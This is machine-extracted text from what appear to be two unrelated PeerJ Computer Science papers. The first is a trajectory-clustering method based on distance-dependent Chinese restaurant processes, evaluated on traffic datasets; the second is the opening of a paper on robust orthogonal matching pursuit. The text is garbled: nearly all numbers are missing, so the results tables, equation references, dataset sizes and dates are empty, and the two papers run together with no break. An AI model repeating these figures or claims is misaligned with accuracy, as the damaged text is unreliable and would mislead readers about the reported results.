. /peerj-cs. dependencies between observation cannot be captured which results in having partial path models in existing ptm approaches. we addressed these problems by using similarity between trajectories as the prior probability in ddcrp. using such a prior probability limits the assignment of trajectories and promotes trajectories to get linked based on how similar two trajectories are. in addition to the similarity measure, whether the trajectories are linked together or not, also will depend on their discrete observation over the grids. since most similarity measures can be applied prior to converting the trajectory into discrete form, such a formulation is less sensitive to the choice of grid size. in addition, since some similarity measures, including modified hausdorff and lcss, also take the order of the observations into account, it is not required to quantise the direction anymore. any raw trajectory ti, is usually represented by a sequence of its ni observation ti =[oi, ,...,oi,l,...,oi,ni]. in this representation, oi,l indicates lth observed position of ith object. let dij to indicate pairwise distance between ith and jth trajectories. this distance can be of any general distance used to measure similarity between trajectories. the result of pairwise distance between n trajectories can be stored in a distance matrix and denoted as d∈<n×n . apart from the calculation of distance matrix discussed above, raw trajectories are converted into bag-of-grids representation. for this, the scene is divided into m grid cells of equal size. based on the cell in which it falls into each observation of a trajectory oi,l, is individually quantised. then a raw trajectory, ti, is approaximated by bag-of-grid represetnation xi∈<m . each element of xi(s) indicates the number of times ith trajectory had an observation in the sth grid cell. 
using ddcrp’s metaphor, we use the bag-of-grid representation of trajectories as customers, clusters as the tables and path models as dishes. based on the definition of ddcrp, it is not possible to draw the table directly. instead, the outgoing link for each customer needs to be drawn. trajectories that directly or indirectly link together are considered to be in the same cluster. all trajectories in the similar cluster share the same path model which is a multinomial distribution over the grid cells. each path model is independently drawn from a base distribution g . in our case, g is a dirichlet distribution. the full generative process for the news program is as follows: . for each trajectory, sample customer assignment ci∼ddcrp(d,f ,τ) as explained in eq. ( ). . drive table assignment from customer assignment. for each table, k, sample its parameter from the base distribution ϕk ∼g . for each trajectory, independently draw xi∼mul(.|ϕzi) the decaying function, f (.), in eq. ( ) was defined as: f (d;γ;γ )=exp(− d γ ). ( ) with this function, the probability of linking two trajectories becomes smaller as their distance increases. the parameterγ controls how fast this probability decays with increasing distance. the inference of ddcrp requires drawing samples for all samples which have the possibility of being linked. arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. inference the key problem that needs to be addressed is computing the posterior distribution of latent customer assignment conditioned on the bag-of-grid cell representation of trajectories x :n . in our problem, the based distribution g , is conjugate to the data generating distribution p(xi|zci,g ). therefore, the cluster parameters ϕk can be analytically marginalised. after such a calculation, the posterior distribution is expressed by: p ( c :n|x :n,d,f ,τ,γ,γ ) ∝ n∏ i= p(ci|d,f ,τ,γ,γ )p(x :n|z(c :n )) ( ) where z(c :n ) denotes the table assignment and p(x :n|z(c :n )) is the likelihood function which can be expressed by blei & frazier ( ) p(x :n|z(c :n))= |z(c :n )|∏ k= p(xzk(c :n )|z(c :n)) ( ) with |z(c :n)| being the number of unique tables and zk(c :n) denoting all customers assigned to table k. due to the combinatorial sum in the denominator, the analytical solution of the posterior given by eq. ( ) is intractable. instead of exact inference, collapsed gibbs strategy (blei & frazier, ) is used to derive the posterior inference where the customer assignment is iteratively sampled from the following equation: p(ci|c−i,x :n,d,f ,τ,γ,γ )∝p(ci|d,f ,τ)×p(x :n|z(ci∪c−i)) ( ) where c−i denotes all customer assignments except for ci. the first term on the right side of the equation is ddcrp’s customer assignment discussed in eq. ( ), and the second term is the likelihood term given by eq. ( ). more details can be found in the supplemental material. results and discussion the performance of the proposed approach was evaluated on the cross (morris & trivedi, ) and the lankershim datasets (ngsim: next generation simulation, ). the cross dataset provides objects trajectories and their ground truth activities. the data are organized into train and test sets. there are , and , trajectories in the train and test sets respectively. two hundred samples in the test set are labeled as abnormal activities. these samples were discarded in this study and we evaluated the proposed model on , trajectories in the test set with legal activities (fig. ). 
the lankershim dataset is part of the next generation simulation (ngsim) program provided by the us federal highway administration (fhwa). the dataset contains videos taken with overhead intersection cameras. the dataset also provided the trajectories of moving vehicles. based on the time the videos are collected, the data are placed into : am to : am and : am to : am subsets. the trajectories took place near an intersection, and trajectories outside of this area were removed (see fig. ). the corresponding x and y coordinate for this region were − < x < and < y < respectively. after arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. figure vehicle trajectories in cross dataset. the colors of trajectories indicate the ground truth ac- tivity label. full-size doi: . /peerjcs. /fig- filtering the trajectories having less than ten observations, a total of trajectories were obtained. since this dataset does not provide activity labels for trajectories, the trajectories were manually labelled into activities ( legal activities, and two activities where agents took illegal maneuvers). the main parameter that needs to be set prior to experiments is the size of the grid cells. theoretically, smaller grid cells produce a better result with the cost of requiring more data. based on the performed experiments, the cell size was set for the cross to × and for the lankershim into × pixels. these choices of cell size divide the cross and lankershim into by and by equal sized grid cells respectively. each raw trajectory was converted into bag-of-grid representation mentioned in the section of trajectory analysis with distance dependent crp. the dimensions of bag-of-grids representations are xi∈< × and xi∈< × for cross and lankershim datasets respectively. the correct clustering rate (ccr) is used to evaluate the clustering performance. the ccr has been used as evaluation criteria to verify trajectory clustering algorithms in several studies (morris & trivedi, ; weiming et al., ; zhang, kaiqi & tieniu, ). given the ground truth set g and resulting clusters set c, corresponding cluster that maximizes arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b figure the lankershim dataset: (a) area of interest, (b) vehicle trajectories in the interest area col- lected from : am to : am. full-size doi: . /peerjcs. /fig- the number of matched labels is found. the ccr is defined as ccr= n k∑ i= pi ( ) where n is the number of trajectories, k is the number of clusters in the ground truth. given the assignment between ground truth and estimated cluster labels, pi is computed as (zhang, kaiqi & tieniu, ): pi= {∣∣ci∩gm∣∣; given ci∈c assigned to gm∈g ; otherwise ( ) the proposed method was compared with dual-hdp and three well-known distance measure methods, lcss, dtw, and modified hausdorff (mh). for each distance, four unsupervised clustering algorithms were used: k-mean clustering, spectral clustering, agglomerative clustering, and graph-based clustering. the average ccr of clustering algorithms for each distance method is reported in this study. one limitation of distance- based clustering techniques is that they require the number of clusters to be given to them. 
to show the effect of choosing the number of clustering on the performance the experiments were run with the different number of clusters, including the true value. the other parameters of competitor methods were set during the course of experiments to achieve their maximum accuracy. for the proposed methods, collapsed gibbs was performed for samples. after each sampling, ccr was evaluated based on the customer assignment result. figure shows ccr per sample for the lankershim and cross datasets. arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b figure clustering accuracy of (a) the cross dataset, (b) the lankershim dataset. full-size doi: . /peerjcs. /fig- table the ccr performance of different methods for the cross dataset. number of clusters dtw . . . . . . . . lcss . . . . . . . . mh . . . . . . . . dual hdp – – – – – . – – ddcrp (dtw) – – – . – – – – ddcrp (lcss) – – – . – – – – ddcrp (mh) – – – . – – – – in all methods, ccr achieves greater than . after the rd sample. the average ccr is obtained by averaging the ccr values after neglecting the first ten samples. the results of trajectory clustering accuracy for the cross dataset are summarized in table . the best correct clustering rate is obtained by ddcrp when using lcss as a distance measure which produces . . the average correct clustering rate of lcss with traditional clustering algorithm is . . while this value is slightly less than the performance produced by lcss and ddcrp, it needs to be highlighted that traditional clustering techniques achieved . correct clustering rate with the assumption of knowing the true total number of clusters. also, the proposed method improves the correct clustering rate regardless of which similarity method is used. in other words, using dtw and mh as similarity measure along with ddcrp achieve better average ccr compared to traditional clustering algorithms. similarly, table summarizes the clustering accuracy for the lankershim dataset. using ddcrp along with mh distance produces the best correct clustering rate of . . same as cross dataset, the proposed method improves correct clustering rate regardless of which similarity measure is used. the most notable improvement is when dtw is used as arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table the ccr performance of different methods for the lankershim dataset. number of clusters dtw . . . . . . . . lcss . . . . . . . . mh . . . . . . . . dual hdp – – – . – – – – ddcrp (dtw) – – – – . – – – ddcrp (lcss) – – – – . – – – ddcrp (mh) – – – – . – – – a b figure founded clusters: (a) the cross dataset by using the ddcrp and the lcss distance meth- ods, (b) the lankershim dataset by using the ddcrp and the mh distance methods. full-size doi: . /peerjcs. /fig- a similarity measure. in this case, the average ccr for similarity-based clustering is . while the combination of dtw and ddcrp results in the ccr of . . after removing clusters with single trajectory and ignoring the initial samples, methods based on ddcrp discovered clusters for both the cross and the lankershim datasets. figure shows the discovered clusters in the th sample for the cross and lankershim datasets. the results shown in this figure are obtained by ddcrp using lcss and mh distances for the cross and lankershim respectively. 
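For reference, the distance-based baselines used above follow a standard recipe: build a pairwise trajectory distance matrix (LCSS, DTW, or MH), run an off-the-shelf clustering algorithm with the number of clusters fixed, and score with CCR. A minimal sketch with SciPy's average-linkage agglomerative clustering is given below; the distance matrix Dm and the cluster count are placeholders, not the experimental settings.

```python
import numpy as np
from scipy.cluster.hierarchy import linkage, fcluster
from scipy.spatial.distance import squareform

def baseline_clustering(Dm, n_clusters):
    """Agglomerative clustering from a precomputed trajectory distance matrix."""
    condensed = squareform(Dm, checks=False)        # condensed upper-triangular form
    Z = linkage(condensed, method='average')        # average-linkage dendrogram
    return fcluster(Z, t=n_clusters, criterion='maxclust')

rng = np.random.default_rng(0)
Dm = rng.uniform(0, 1, (20, 20)); Dm = (Dm + Dm.T) / 2; np.fill_diagonal(Dm, 0.0)
labels = baseline_clustering(Dm, n_clusters=4)      # score e.g. with the CCR sketch above
```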
the discovered clusters are typical activities in an intersection and include crossing the intersection, turning left, turning right, and u-turn. as discussed in the trajectory analysis with distance dependent crp section, the size of the grid impacts the accuracy of any ptm-based trajectory analysis system. another advantage of the proposed method compared to the dual-hdp method is that it is less sensitive to the choice of grid size. this is due to the fact that most ptm models, including dual hdp, are based only on bag-of-grids representation of the trajectories. the proposed method, however, uses both bag-of-grids and pairwise distance between raw trajectories. therefore, it can be expected that the proposed method is less sensitive to the choice of grid sizes. arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b figure the impact of grid size on the clustering accuracy: (a) the cross dataset, (b) the lanker- shim dataset. full-size doi: . /peerjcs. /fig- figure shows the average the ccr of the ddcrp and dual-hdp systems for different sizes of the grid. the grid size of × and × pixels produces . and . correct clustering rate for the dual-hdp method in the cross and lankershim datasets respectively. however, the accuracy substantially decreases by increasing or decreasing the grid size. the proposed method, however, is more robust to the choice of grid size since the pairwise distance between trajectories is independent of the choice of grid size. the aim of trajectory path modelling is to discover the paths commonly taken by objects in each cluster. one benefit of our method is its ability to model the path simultaneous to trajectory clustering. in our study, each path is characterized by the distribution over grid cells in a scene. each cell for a path can be associated to any number in the range of to , where are the cells that have no chance of being observed in that path. as the values of a cell are closer to , this cell become more essential for the path, and the probability of it being passed by trajectories belonging to that path increases. the path modelling experiments were conducted with the same parameter setup discussed earlier in this section. figure shows the cluster models for the cross and lankershim datasets. the blue cells are less likely to be observed by trajectories in that cluster. conversely, the red cells are more probably observed by trajectories. then most paths have their probable grid cells in the middle of their route, while when moving further away to the edges of the routes, the probability of grid cells decreases. conclusion this paper proposed an unsupervised approach for trajectory clustering and modelling. the generative process of trajectory analysis was modelled via a probabilistic model. the pairwise distances were used as prior in ddcrp to promoting similar trajectories to be clustered. the ddcrp were used to combine the advantages of similarity-based and ptm-based approaches. compared to probabilistic topic approaches, our method is able to model the full path taken by agents in each cluster. unlike most similarity-based methods, arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b figure cluster models: (a) the cross dataset, (b) the lankershim dataset. full-size doi: . /peerjcs. /fig- our method drives the number of clusters automatically. 
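Since the grid-size discussion above hinges on how coarsely the scene is discretised, a small sketch of the bag-of-grid conversion may help; the scene extent and cell_size below are placeholders rather than the experimental values, and each path model is simply a multinomial over the same cells.

```python
import numpy as np

def bag_of_grids(trajectory, x_range, y_range, cell_size):
    """Convert a raw trajectory (T, 2) of (x, y) points into visit counts over
    a regular grid; smaller cells give finer, but data-hungrier, path models."""
    nx = int(np.ceil((x_range[1] - x_range[0]) / cell_size))
    ny = int(np.ceil((y_range[1] - y_range[0]) / cell_size))
    counts = np.zeros(nx * ny)
    ix = np.clip(((trajectory[:, 0] - x_range[0]) // cell_size).astype(int), 0, nx - 1)
    iy = np.clip(((trajectory[:, 1] - y_range[0]) // cell_size).astype(int), 0, ny - 1)
    np.add.at(counts, iy * nx + ix, 1)              # accumulate visits per cell
    return counts                                    # bag-of-grid vector of length nx*ny

traj = np.array([[1.0, 1.0], [2.5, 1.2], [4.0, 1.9], [5.5, 2.4]])
print(bag_of_grids(traj, x_range=(0, 10), y_range=(0, 10), cell_size=2.0).reshape(5, 5))
```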
the proposed trajectory analysis system clusters the trajectories and models the clusters’ paths at the same time. specifically, raw trajectories were converted to bag-of-grid cells representation and considered each cluster with its distribution over the grids. experimental results confirmed the effectiveness and usefulness of the proposed algorithm in trajectory clustering and modelling compared to other methods. the proposed approach is planned to have an online learning capability, where the cluster and path models keep updated as more data is observed. additional information and declarations funding this work was supported by the ministry of education malaysia by through a research university grant of university technology malaysia (utm), project titled ‘‘intelligent fault detection and diagnosing for process plant r.k . . j .’’ the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: ministry of education malaysia by through a research university grant of university technology malaysia (utm). competing interests the authors declare there are no competing interests. author contributions • reza arfa, rubiyah yusof and parvaneh shabanzadeh conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. computation work, authored or reviewed drafts of the paper, approved the final draft, the authors contributed equally to the completion of the manuscript. data availability the following information was supplied regarding data availability: the code is available at: https://github.com/rezaarfa/motionlearning and in the supplemental information. the cross dataset can be downloaded from http://cvrr.ucsd.edu/bmorris/datasets/ dataset_trajectory_analysis.html. the lankershim is part of the ngsim dataset and can be downloaded from https://ops.fhwa.dot.gov/trafficanalysistools/ngsim.htm. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aköz Ö, karsligil me. . traffic event classificati on at intersections based on the severity of abnormality. machine vision and applications : – doi . /s - - - . atev s, miller g, papanikolopoulos np. . clustering of vehicle trajecto- ries. ieee transactions on intelligent transportation systems : – doi . /tits. . . baldassano c, beck dm, li f-f. . parcellating connectivity in spatial maps. peerj :e doi . /peerj. . blei dm, frazier pi. . distance dependent chinese restaurant processes. journal of machine learning research : – . dee hm, velastin sa. . how close are we to solving the problem of automated visual surveillance? machine vision and applications : – doi . /s - - -z. fox eb, sudderth eb, willsky as. . hierarchical dirichlet processes for tracking maneuvering targets. in: th international conference on information fusion. ieee, – doi . /icif. . . gershman sj, blei dm. . a tutorial on bayesian nonparametric models. journal of mathematical psychology : – doi . /j.jmp. . . . ghosh s, ungureanu ab, sudderth eb, blei dm. . spatial distance dependent chinese restaurant processes for image segmentation. 
in: proceedings of the th international conference on neural information processing systems. granada, spain: curran associates inc., – . jeong h, chang hj, choi jy. . modeling of moving object trajectory by spatio- temporal learning for abnormal behavior detection. in: advanced video and signal- based surveillance (avss), th ieee international conference on. piscataway: ieee, – doi . /avss. . . arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rezaarfa/motionlearning http://dx.doi.org/ . /peerj-cs. #supplemental-information http://cvrr.ucsd.edu/bmorris/datasets/dataset_trajectory_analysis.html http://cvrr.ucsd.edu/bmorris/datasets/dataset_trajectory_analysis.html https://ops.fhwa.dot.gov/trafficanalysistools/ngsim.htm http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /icif. . http://dx.doi.org/ . /j.jmp. . . http://dx.doi.org/ . /avss. . http://dx.doi.org/ . /peerj-cs. jonsen id, myers ra, flemming jm. . meta-analysis of animal movement using state-space models. ecology : – doi . / - . joseph j, doshi-velez f, huang as, roy n. . a bayesian nonparametric approach to modeling motion patterns. autonomous robots : – doi . /s - - -x. keogh ej, pazzani mj. . scaling up dynamic time warping for datamining applications. in: proceedings of the sixth acm sigkdd international confer- ence on knowledge discovery and data mining. new york: acm, – doi . / . . lei s, fan j, zhongke s, molina r, katsaggelos ak. . toward dynamic scene un- derstanding by hierarchical motion pattern mining. ieee transactions on intelligent transportation systems : – doi . /tits. . . makris d, ellis t. . learning semantic scene models from observing activity in visual surveillance. ieee transactions on systems, man, and cybernetics, part b (cybernetics) : – doi . /tsmcb. . . morris b, trivedi m. . learning trajectory patterns by clustering: experimental stud- ies and comparative evaluation. in: ieee conference on computer vision and pattern recognition, . piscataway: ieee, – doi . /cvpr. . . morris bt, trivedi mm. . trajectory learning for activity understanding: unsuper- vised, multilevel, and long-term adaptive approach. ieee transactions on pattern analysis and machine intelligence : – doi . /tpami. . . ng ay, jordan mi, weiss y. . on spectral clustering: analysis and an algorithm. in: proceedings of the th international conference on neural information processing systems: natural and synthetic. vancouver, british columbia, canada: mit press, – . ngsim: next generation simulation. . in. . available at www.ngsim.fhwa.dot. gov: fhwa, u.s. department of transportation. pao h-k, fadlil j, lin h-y, chen k-t. . trajectory analysis for user verification and recognition. knowledge-based systems : – doi . /j.knosys. . . . papadopoulos an. . trajectory retrieval with latent semantic analysis. in: proceed- ings of the acm symposium on applied computing. new york: acm, – . pitman j. . combinatorial stochastic processes. technical report . available at https://www.stat.berkeley.edu/~pitman/ .pdf . reed m, johansen Ø, brandvik pj, daling p, lewis a, fiocco r, mackay d, prentki r. . oil spill modeling towards the close of the th century: overview of the state of the art. spill science & technology bulletin : – doi . /s - ( ) - . ren q, wang q, zhang j, chen s. . 
unordered images selection for dense d re- construction based on distance dependent chinese restaurant process. in: intelligent control and automation (wcica), th world congress on. ieee, – doi . /wcica. . . arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . / . http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /tpami. . www.ngsim.fhwa.dot.gov www.ngsim.fhwa.dot.gov http://dx.doi.org/ . /j.knosys. . . https://www.stat.berkeley.edu/~pitman/ .pdf http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /wcica. . http://dx.doi.org/ . /peerj-cs. tian b, morris bt, tang m, liu y, yao y, gou c, shen d, tang s. . hierarchical and networked vehicle surveillance in its: a survey. ieee transactions on intelligent transportation systems : – doi . /tits. . . vlachos m, kollios g, gunopulos d. . discovering similar multidimensional trajectories. in: th international conference on data engineering, . piscataway: ieee, – doi . /icde. . . wang x, ma kt, ng g-w, grimson wel. . trajectory analysis and semantic region modeling using nonparametric hierarchical bayesian models. international journal of computer vision : – doi . /s - - - . weiming h, xi l, guodong t, maybank s, zhongfei z. . an incremental dpmm-based method for trajectory clustering, modeling, and retrieval. ieee transactions on pattern analysis and machine intelligence : – doi . /tpami. . . weiming h, xuejuan x, zhouyu f, xie d, tieniu t, maybank s. . a system for learning statistical motion patterns. ieee transactions on pattern analysis and machine intelligence : – doi . /tpami. . . xi l, weiming h, wei h. . a coarse-to-fine strategy for vehicle motion trajectory clustering. in: th international conference on pattern recognition, . – doi . /icpr. . . yiwen w, tze iy, keathly d, buckles b. . dynamic scene modelling and anomaly detection based on trajectory analysis. iet intelligent transport systems : – doi . /iet-its. . . zhang t, lu h, li sz. . learning semantic scene models by object classification and trajectory clustering. in: ieee conference on computer vision and pattern recognition. piscataway: ieee, – doi . /cvpr. . . zhang z, kaiqi h, tieniu t. . comparison of similarity measures for trajectory clustering in outdoor surveillance scenes. in: th international conference on pattern recognition, . – doi . /icpr. . . arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /icde. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /icpr. . http://dx.doi.org/ . /iet-its. . http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /icpr. . http://dx.doi.org/ . /peerj-cs. submitted january accepted april published may corresponding author carlos a. loza, cloza@usfq.edu.ec academic editor mikael skoglund additional information and declarations can be found on page doi . /peerj-cs. copyright loza distributed under creative commons cc-by . open access robomp: robust variants of orthogonal matching pursuit for sparse representations carlos a. loza department of mathematics, universidad san francisco de quito, quito, ecuador abstract sparse coding aims to find a parsimonious representation of an example given an observation matrix or dictionary. 
in this regard, orthogonal matching pursuit (omp) provides an intuitive, simple and fast approximation of the optimal solution. however, its main building block is anchored on the minimization of the mean squared error cost function (mse). this approach is only optimal if the errors are distributed according to a gaussian distribution without samples that strongly deviate from the main mode, i.e. outliers. if such assumption is violated, the sparse code will likely be biased and performance will degrade accordingly. in this paper, we introduce five robust variants of omp (robomp) fully based on the theory of m-estimators under a linear model. the proposed framework exploits efficient iteratively reweighted least squares (irls) techniques to mitigate the effect of outliers and emphasize the samples corresponding to the main mode of the data. this is done adaptively via a learned weight vector that models the distribution of the data in a robust manner. experiments on synthetic data under several noise distributions and image recognition under different combinations of occlusion and missing pixels thoroughly detail the superiority of robomp over mse-based approaches and similar robust alternatives. we also introduce a denoising framework based on robust, sparse and redundant representations that open the door to potential further applications of the proposed techniques. the five different variants of robomp do not require parameter tuning from the user and, hence, constitute principled alternatives to omp. subjects algorithms and analysis of algorithms, artificial intelligence, computer vision, data mining and machine learning, data science keywords m-estimation, matching pursuit, representation-based classifier, robust classification, sparse representation, outliers introduction sparse modeling is a learning framework with relevant applications in areas where parsimonious representations are considered advantageous, such as signal processing, machine learning, and computer vision. dictionary learning, image denoising, image super–resolution, visual tracking and image classification constitute some of the most celebrated applications of sparse modeling (aharon, elad & bruckstein, ; elad & aharon, ; mallat, ; wright et al., ; elad, figueiredo & ma, ; xu et al., ). strictly speaking, sparse modeling refers to the entire process of designing and learning a model, while sparse coding, sparse representation, or sparse decomposition is how to cite this article loza ca. . robomp: robust variants of orthogonal matching pursuit for sparse representations. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:cloza@usfq.edu.ec https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. an inference process—estimation of the latent variables of such model. the latter formally emerged as a machine learning adaptation of the sparse coding scheme found in the mammalian primary visual cortex (olshausen & field, ). the sparse coding problem is inherently combinatorial and, therefore, intractable in practice. thus, classic solutions involve either greedy approximations or relaxations of the original ` -pseudonorm. 
examples of the former family of algorithms include matching pursuit (mp) and all of its variants (mallat & zhang, ), while basis pursuit (chen, donoho & saunders, ) and lasso (tibshirani, ) are the archetypes of the latter techniques. particularly, orthogonal matching pursuit (omp) is usually regarded as more appealing due to its efficiency, convergence properties, and simple, intuitive implementation based on iterative selection of the most correlated predictor to the current residual and batch update of the entire active set (tropp & gilbert, ). the success of omp is confirmed by the many variants proposed in the literature. wang, kwon & shim ( ) introduced generalized omp (gomp) where more than one predictor or atom (i.e., columns of the measurement matrix or dictionary) are selected per iteration. regularized omp (romp) exploits a predefined regularization rule (needell & vershynin, ), while cosamp incorporates additional pruning steps to refine the estimate recursively (needell & tropp, ). the implicit foundation of the aforementioned variants—and, hence, of the original omp—is optimization based on ordinary least squares (ols), which is optimal under a mean squared error (mse) cost function or, equivalently, a gaussian distribution of the errors. any deviation from such assumptions, e.g., outliers, impulsive noise or non–gaussian additive noise, would result in biased estimations and performance degradation in general. wang, tang & li ( ) proposed correntropy matching pursuit (cmp) to mitigate the detrimental effect of outliers in the sparse coding process. basically, the correntropy induced metric replaces the mse as the cost function of the iterative active set update of omp. consequently, the framework becomes robust to outliers and impulsive noise by weighing the input samples according to a gaussian kernel. the resulting non–convex performance surface is optimized via the half–quadratic (hq) technique to yield fast, iterative approximations of local optima (geman & yang, ; nikolova & ng, ). even though the algorithm is successful in alleviating the effect of outliers in practical applications, the main hyperparameter—the gaussian kernel bandwidth—is chosen empirically with no theoretical validation. with this mind, we propose a generalization of cmp by reformulating the active set update under the lens of robust linear regression; specifically, we exploit the well known and developed theory of m–estimators (andersen, ; huber, ) to devise five different robust variants of omp: robomp. each one utilizes validated hyperparameters that guarantee robustness up to theoretical limits. in addition, the hq optimization technique is reduced to the iteratively reweighted least squares (irls) algorithm in order to provide an intuitive and effective implementation while still enjoying the weighing nature introduced in cmp. for instance, fig. illustrates the estimated error in a –dimensional observation vector with a % rate of missing samples (set equal to zero). while tukey–estimator– based–omp practically collapses the error distribution after decompositions, the omp loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure illustration of the robustness of the proposed method. (a) y ∈ ir constitutes an observation vector with five missing samples (set to zero, marked in red). (b) eomp and (c) eomp are the resulting errors after the first and tenth iteration of omp (with corresponding box plots as insets), respectively. 
(d) x_OMP is the final estimated sparse decomposition after the OMP iterations. The RobOMP counterparts (Tukey estimator, f–g) reduce the dynamic range of the errors more aggressively until almost collapsing to a delta distribution; this results in optimal sparse coding (h). (e) w_Tukey is the learned weight vector that assigns values close to one to samples around the main mode of the data and small weights to potential outliers (red marks). The number of iterative sparse decompositions equals the ground-truth cardinality of the sparse active set, i.e., K = K_0.
The OMP counterpart still leaves a remnant that results in suboptimal sparse coding. Moreover, RobOMP provides an additional output that effectively weighs the components of the input space on a [0, 1] scale. In particular, the missing samples are indeed assigned weights close to zero in order to alleviate their effect on the estimation of the sparse decomposition.
We present three different sets of results to validate the proposed robust, sparse inference framework. First, synthetic data with access to the ground truth (the support of the representation) highlight the robustness of the estimators under several types of noise, such as additive non-Gaussian densities and instance-based degradation (e.g., missing samples and impulsive noise). Then, a robust sparse representation-based classifier (RSRC) is developed for image recognition under missing-pixel and occlusion scenarios; the results outperform the OMP-based variants and the CMP-based classifier (CMPC) in several cases. Lastly, preliminary results on image denoising via sparse and redundant representations over overcomplete dictionaries are presented, with the hope of exploiting RobOMP in the future for image denoising under non-Gaussian additive noise. The rest of the paper is organized as follows: the next section details the state of the art and related work concerning greedy approximations to the sparse coding problem; the section after that introduces the theory, rationale, and algorithms of M-estimation-based robust OMP (RobOMP); the subsequent sections detail the results using synthetic data and popular digital image databases, and then discuss more in-depth technical concepts, analyze the implications of the proposed framework, and offer potential further work; the final section concludes the paper.
State of the art and related work
Let y ∈ R^m be a measurement vector with an ideal, noiseless, sparse representation x_0 ∈ R^n with respect to the measurement matrix (also known as the dictionary) D ∈ R^{m×n}. The matrix D is usually overcomplete, i.e., m < n, to promote sparse decompositions. In practice, y is affected by a noise component n ∈ R^m. This results in the following constrained, linear, additive model:
y = D x_0 + n \quad \text{s.t.} \quad \|x_0\|_0 = K_0, ( )
where K_0 indicates the support of the sparse decomposition and \|\cdot\|_0 represents the \ell_0-pseudonorm, i.e., the number of non-zero components of x_0. The sparse coding framework aims to estimate x_0 given the measurement vector and matrix plus a sparsity constraint.
MSE-based OMP
Orthogonal matching pursuit (Tropp & Gilbert, ) attempts to find the locally optimal solution by iteratively selecting the atom of D most correlated with the current residual. In particular, OMP initializes the residual r_0 = y, an empty active set Λ_0 = ∅ (the set containing the indices of the atoms that are part of the decomposition), and the iteration counter k.
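A minimal sketch of the generative model in Eq. ( ) follows; the dimensions and noise level are arbitrary placeholders, since the experimental values appear later and are partly illegible in this copy.

```python
import numpy as np

rng = np.random.default_rng(1)
m, n, K0 = 64, 128, 10                  # assumed sizes; D is overcomplete (m < n)
D = rng.standard_normal((m, n))
D /= np.linalg.norm(D, axis=0)          # unit-norm atoms (columns)

x0 = np.zeros(n)                        # ideal K0-sparse code
support = rng.choice(n, K0, replace=False)
x0[support] = rng.standard_normal(K0)

noise = 0.05 * rng.standard_normal(m)   # additive noise component
y = D @ x0 + noise                      # observation vector per Eq. ( )
```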
In the kth iteration, the algorithm finds the predictor most correlated with the current residual:
\lambda_k = \arg\max_{i \in \Omega} |\langle r_{k-1}, d_i \rangle|, ( )
where ⟨·,·⟩ denotes the inner product, d_i represents the ith column of D, and \Omega = \{1, 2, \ldots, n\}. The resulting atom is added to the active set Λ, i.e.,
\Lambda_k = \Lambda_{k-1} \cup \{\lambda_k\}. ( )
The next step is the major refinement over the original matching pursuit algorithm (Mallat & Zhang, ): instead of updating the sparse decomposition one component at a time, OMP updates all the coefficients corresponding to the active set at once according to an MSE criterion,
x_k = \arg\min_{x \in \mathbb{R}^n,\ \mathrm{supp}(x) \subset \Lambda_k} \|y - Dx\|_2, ( )
where supp(x) is the support set of the vector x. Equation ( ) can be readily solved via OLS, i.e., linear regression where the predictors are the columns of D indexed by Λ_k and the response is the measurement vector y. Stopping criteria for OMP typically include a set number of iterations or compliance with a minimum residual error. In the end, the estimated sparse code x is set to the last x_k obtained. In practice, the true sparsity pattern K_0 is unknown and the total number of OMP iterations, K, is treated as a hyperparameter. For a detailed analysis of the convergence and recovery error bounds of OMP, see Donoho, Elad & Temlyakov ( ). A potential drawback of OMP is the extra computational complexity added by the OLS solver: each incremental update of the active set increases the time complexity of the algorithm polynomially in the current iteration k.
